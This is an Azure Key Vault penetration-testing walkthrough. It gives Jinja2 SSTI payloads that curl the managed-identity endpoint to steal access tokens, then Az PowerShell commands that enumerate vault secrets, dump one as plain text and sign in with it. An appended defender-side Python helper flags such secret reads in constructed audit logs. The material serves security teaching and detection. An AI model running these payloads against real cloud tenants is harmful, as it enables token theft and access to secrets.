Key Vault

Key Vault is Azure's service for storing secrets such as passwords, connection strings, certificates and private keys. With the right permissions, Azure resources that support managed identities (VMs, App Service, Functions, containers) can retrieve secrets from the key vault without holding any credentials of their own.

Identifier

Objects in a key vault are identified by an object identifier URL. The base URL has the format:

https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}

The vault-name is globally unique, and the object-type is one of "keys", "secrets" or "certificates".

Access to key vaults

Key Vaults support both Azure RBAC and access policies. With RBAC, a principal such as an application can be assigned a role like "Key Vault Secrets User" or "Key Vault Administrator".

If we can compromise an Azure resource whose managed identity can read secrets from a key vault, it may be possible to gain access to more resources. Note that each secret has its own IAM scope, inherited from the key vault.

Roles that can access secrets

Abuse example

We have an App Service that is vulnerable to Jinja2 SSTI. Through it we ask the managed identity endpoint for an access token scoped to the vault.azure.net resource:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

We also need an access token for ARM (management.azure.com):

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

We sign in with the Az PowerShell module using both tokens:

Connect-AzAccount -AccessToken $armtoken -AccountId 2e91a4fe-a0f2-46ee-8214-xxx -KeyVaultToken $token

Next, check if we have at least a reader role on a key vault:

Get-AzKeyVault


Vault Name          : vault
Resource Group Name : Research
Location            : germanywestcentral

Check if we can read Secrets:

Get-AzKeyVaultSecret -VaultName vault


Vault Name   : researchkeyvault
Name         : Reader
Version      :
Id           : https://vault.vault.azure.net:443/secrets/Reader
Enabled      : True
Expires      :
Not Before   :
Created      : 1/7/2025 8:04:22 AM
Updated      : 1/7/2025 8:04:22 AM
Content Type :
Tags         :

Finally, extract the secret as plain text:

Get-AzKeyVaultSecret -VaultName xxx -Name Reader -AsPlainText
username: [email protected] ; password: Password123!

Use the recovered credentials to sign in with Az PowerShell:

$passwd = ConvertTo-SecureString "Password123!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("[email protected]", $passwd)
Connect-AzAccount -Credential $creds
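As an added, defender-side example that is not part of this page: a Python helper that parses object identifier URLs of the form given in the Identifier section and triages Key Vault AuditEvent diagnostic records for the pattern in the walkthrough above, a managed identity listing secrets and then reading one outside its expected set. The log records, the identity object id and the baseline are constructed, and the field names (operationName, resultType, identity.claim.oid, properties.id) are assumed to follow the Key Vault diagnostic log schema.

```python
import json
from urllib.parse import urlparse

KV_SUFFIX = ".vault.azure.net"
OBJECT_TYPES = {"keys", "secrets", "certificates"}

def vault_name(url):
    """Vault name from the host of a Key Vault URL (an explicit :443 is dropped)."""
    host = urlparse(url).hostname or ""
    if not host.endswith(KV_SUFFIX):
        raise ValueError(f"not a Key Vault host: {host}")
    return host[: -len(KV_SUFFIX)]

def parse_object_id(url):
    """Split {type}/{name}[/{version}] from the path; version is optional (latest)."""
    parts = [p for p in urlparse(url).path.split("/") if p]
    if len(parts) not in (2, 3) or parts[0] not in OBJECT_TYPES:
        raise ValueError(f"malformed object path in {url}")
    return {"vault": vault_name(url), "type": parts[0], "name": parts[1],
            "version": parts[2] if len(parts) == 3 else None}

def _event(op, oid, obj_id, result="Success"):
    """Build one constructed AuditEvent record (field names assumed from the KV log schema)."""
    return json.dumps({"operationName": op, "resultType": result,
                       "identity": {"claim": {"oid": oid}}, "properties": {"id": obj_id}})

APP_OID = "11111111-app-svc"   # constructed object id of the App Service's managed identity
SAMPLE_LOG = "\n".join([
    _event("SecretGet", APP_OID, "https://vault.vault.azure.net/secrets/DbConn/0a1b2c"),
    _event("SecretList", APP_OID, "https://vault.vault.azure.net/secrets"),
    _event("SecretGet", APP_OID, "https://vault.vault.azure.net:443/secrets/Reader"),
    _event("SecretGet", APP_OID, "https://vault.vault.azure.net/secrets/Admin", "Forbidden"),
])
EXPECTED = {APP_OID: {"DbConn"}}   # constructed baseline: secrets each identity should read

def flag_secret_reads(log_text, expected=EXPECTED):
    """(oid, vault, secret) for each successful SecretList and each successful
    SecretGet whose secret name is outside the caller's baseline."""
    findings = []
    for line in log_text.splitlines():
        ev = json.loads(line)
        if ev.get("resultType") != "Success":
            continue                         # denied calls are outside this rule
        oid = ev["identity"]["claim"].get("oid", "?")
        op, obj_id = ev["operationName"], ev["properties"]["id"]
        if op == "SecretList":               # enumeration precedes the targeted read
            findings.append((oid, vault_name(obj_id), "<list>"))
        elif op == "SecretGet":
            obj = parse_object_id(obj_id)
            if obj["name"] not in expected.get(oid, set()):
                findings.append((oid, obj["vault"], obj["name"]))
    return findings
```

Against the constructed log, the DbConn read is within baseline and the denied Admin read is skipped, so only the listing and the read of Reader are reported.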
